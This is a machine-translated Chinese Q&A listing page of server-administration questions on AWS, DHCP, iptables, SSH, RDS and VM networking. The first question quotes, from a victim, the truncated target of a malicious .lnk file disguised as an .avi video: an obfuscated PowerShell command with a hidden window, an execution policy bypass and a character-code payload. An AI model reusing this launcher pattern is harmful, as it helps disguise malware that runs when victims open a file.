问题列表 - 第4947页

这是对 Powershell 的恶意软件调用吗?

我得到了一个.avi乍一看的文件,但后来我发现这实际上是一个.lnk文件,但为时已晚。

该文件的目标元素属性是 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

出发点是: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

我从以下 ASCII 代码中创建了 String,它似乎是Hallo World!. 这似乎很混乱到我,因为我无法找到NoPrWindeXEc在PowerShell中的文档的任何位置参数,additionaly由于某些原因,文件有700MB的大小,直到我删除.avi从文件描述字段值。

你知道这个文件可以尝试做什么吗?

malware

6
推荐指数
2
解决办法
1977
查看次数

AWS 安全组 - 如何允许来自另一个安全组的公共 IP

我在 VPC 不同的安全组中有两个实例,每个实例都有自己的公共 IP。我希望实例一能够连接到其公共 IP 上的实例二。我发现授予对安全组的访问权限,只允许访问私有 IP,而不是公共 IP。

我现在已经定义了我的安全组,以允许访问位于其他安全组中的实例的公共 IP。但是,这很不方便,因为我无法轻松自动执行此操作(想想 Ansible),因为我首先需要查找 DNS 名称,然后才能将其添加到组中。

有谁知道这样做的更简单的方法?

总结一下:

  • 实例 1 -> 1.2.3.4
  • 实例 2 -> 5.6.7.8

实例 1 需要访问其公共 IP 上的实例 2。我目前最终不得不手动查找实例 1 的 IP,然后将其添加到实例 2 的安全组中。

amazon-ec2 amazon-web-services amazon-elastic-ip security-groups

7
推荐指数
2
解决办法
4733
查看次数

Windows 机器被分配了错误的网络掩码

我有一个基于 Debian 的 DHCP 服务器。它为225.225.225.0除 Windows 机器之外的所有设备(WiFi 路由器、voip、扫描仪)分配正确的网络掩码。他们都是224.0.0.0出于某种原因被分配的。它们都设置为通过 DHCP 接收 IP;没有对路由表进行任何操作。为什么他们这样配置?

的设置isc-dhcp-server

option domain-name "example.com";
option domain-name-servers 8.8.8.8, 8.8.4.4;
option subnet-mask 255.255.255.0;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

subnet 192.168.1.0 netmask 255.255.255.0 {
  option routers 192.168.1.1;
  option subnet-mask    225.225.225.0;
  range 192.168.1.20 192.168.1.200;
}

host gnulinuxpc {
  hardware ethernet 00:30:48:b8:52:cb;
  fixed-address 192.168.1.2;
  option subnet-mask    225.225.225.0;
}

host windowspc {
  hardware ethernet 00:18:f3:5e:bb:d3;
  fixed-address 192.168.1.3;
  option subnet-mask    225.225.225.0;
}
Run Code Online (Sandbox Code Playgroud)

dhcp windows isc-dhcp

0
推荐指数
1
解决办法
201
查看次数

为什么 iptables 中所有目标的 ACCEPT all 不允许端口 8445?

我有一个测试服务器,它具有以下 IPtables 配置:

[root@rhel64 /]# iptables --list
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED
ACCEPT     icmp --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     tcp  --  anywhere             anywhere            state NEW tcp dpt:ssh
REJECT     all  --  anywhere             anywhere            reject-with icmp-host-prohibited

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
REJECT     all  --  anywhere             anywhere            reject-with icmp-host-prohibited

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
Run Code Online (Sandbox Code Playgroud)

当我尝试访问侦听端口 8445 的应用程序时,它被拒绝。一旦我添加了一条规则专门允许 8445 的 tcp …

linux redhat iptables linux-networking

3
推荐指数
1
解决办法
2584
查看次数

权限被拒绝(公钥) - mac

我无法登录我的 Droplet。这是我就该问题发表的另一篇文章,但没有解决我的问题,但解释了我尝试过的一些方法。 /sf/ask/3704222931/?noredirect=1#comment92856534_52972508

我刚刚尝试过的:

  1. ssh-key gen. 命名键portfolio。这个命名会不会有问题?在我的机器上唯一可用的键是具有默认名称的键id_rsa,但具有该名称的键不能超过一组。调试中有一行Offering public key: RSA SHA256:blahblah /Users/ME/.ssh/id_rsa说它看起来像连接到错误的键???我试图ssh -i ~/.ssh/portfolio ME@139.xx.xx.xxx连接到一个名为portfolio. 不。Permission denied (publickey).

  2. 在 DO 控制台内登录服务器。nano /.ssh/authorized_keys. 复制我的名为投资组合的公钥。在这里得到这个

  3. 创建一个新用户并保存。
  4. 使用我的 Mac 上的终端测试密钥对 ssh -v -i ~/.ssh/portfolio newUSer@139.XX.XXX.XXX

大胖子Permission denied (publickey).显然登录也不行。为什么?密钥匹配并就位,但仍然找不到彼此。

进一步调试:使用数字海洋控制台,目前我可以访问我的液滴的唯一方法,我发现复制/粘贴不起作用。粘贴公钥会产生与真实密钥完全不同的字符串。这甚至发生在nano中。

ssh digital-ocean

4
推荐指数
1
解决办法
4万
查看次数

Amazon RDS mysql 启用慢查询日志

我正在尝试通过 RDS Web 控制台启用慢查询日志。

我们在 RDS 上使用 mysql 5.6,而不是 aurora。

我将 Slow_query_log 的参数组值更改为 1 long_query_time 到 5 Slow_query_log_file 为 /rdsdbdata/log/slowquery/mysql-slowquery.log

显示全球状态;显示 Slow_queries 的值为 2817006 并且正在增加,因此显然存在慢速查询,但日志中没有任何内容。

下载的日志日志如下

日志已创建但日志内容不包含任何sql

/rdsdbbin/mysql/bin/mysqld, Version: 5.6.34-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306  Unix socket: /tmp/mysql.sock
Time                 Id Command    Argument
/rdsdbbin/mysql/bin/mysqld, Version: 5.6.34-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306  Unix socket: /tmp/mysql.sock
Time                 Id Command    Argument
/rdsdbbin/mysql/bin/mysqld, Version: 5.6.34-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306  Unix socket: …
Run Code Online (Sandbox Code Playgroud)

mysql amazon-web-services rds

4
推荐指数
1
解决办法
2539
查看次数

同一操作系统的多个实例

我很快就会教一个动手课程,我需要为每个学生旋转大约 20 个虚拟机。有点像实验室。我班上大约有 15 名学生。您可以猜测这会以多快的速度失控。运行 230 多个 VM 需要大量资源,我的大学拒绝为这些资源付费。如果可能的话,我想实现的是将一台机器作为基本操作系统,以一种方式自我复制 15 次。我希望每个学生共享同一个系统,但也有一个具有专用 IP 地址的隔离环境:

  • 基本操作系统 Windows 或 Linux
  • 学生一在 192.168.1.2 上连接到它
  • 学生二在 192.168.1.3 上连接到它
  • 每个学生共享同一个主机,但是有一些隔离层,因此他们不会相互交互。

所有机器都将作为 VM 运行,有些将是 Linux,有些将是 Windows。我知道你们中的一些人可能会说 Docker,但并不是我真正想要的。有任何想法吗?

linux windows operating-system

3
推荐指数
1
解决办法
336
查看次数

AWS Glue 是否符合 PCI DSS 要求?

我是 PCI 领域的新手,但需要为我的团队研究 ETL(提取-转换-加载)解决方案,以将数据从一个地方移动到另一个地方。我查看了亚马逊的PCI DSS 合规资源列表,发现 Glue 不在那里。这是否意味着当需要 PCI DSS 合规性时不应使用 Glue?或者它不需要,因为它不存储数据,只是转换数据并将数据加载到 RDS 数据存储中?

pci-dss amazon-web-services

4
推荐指数
1
解决办法
257
查看次数

如何提高我的虚拟机之间的数据传输率

我看了很多文章,但没有回答我的问题。

我的服务器使用 VMware vSphere Hypervisor。我的服务器中有 20 台虚拟机。

虚拟机操作系统:centos7

我已经将我的vSwitchVM 网络带宽更改为 1000000000 KB/s

所以其他虚拟机不会影响我的 dtr(数据传输率)。

现在我的 dtr 是 170 ~ 200 MB/s

我如何将我的 dtr 增加到 500 MB/s,以便我可以更快地将 20 GB 的文件从 A vm 传输到 B vm。

VM A : nc -l 20000 > /dev/null

VM B : time dd if=/dev/zero bs=100M count=200 | nc <VM A> 20000

200+0 records in
200+0 records out
20971520000 bytes (21 GB) copied, 122.466 s, 171 MB/s

real    2m2.479s
user    0m2.148s
sys     3m10.841s …
Run Code Online (Sandbox Code Playgroud)

bandwidth file-transfer linux-networking vmware-esxi

5
推荐指数
1
解决办法
5008
查看次数

所有日志文件似乎都已删除

我想切换到ubuntu服务器上的日志目录,并检查duplicity log,但我不知道发生了什么,似乎所有的日志文件和子目录都丢失了!这是我登录服务器时使用的命令:

sudo su | cd /var/log | cat duplicity.log | grep -i '. errors' | sort | uniq
Run Code Online (Sandbox Code Playgroud)

我想我应该用&&. 我有几个问题,我可以以某种方式恢复日志吗?他们会继续像往常一样出现吗?删除所有日志文件会产生一些服务器问题吗?为什么会这样?

linux ubuntu log-files logging ubuntu-16.04

-3
推荐指数
1
解决办法
47
查看次数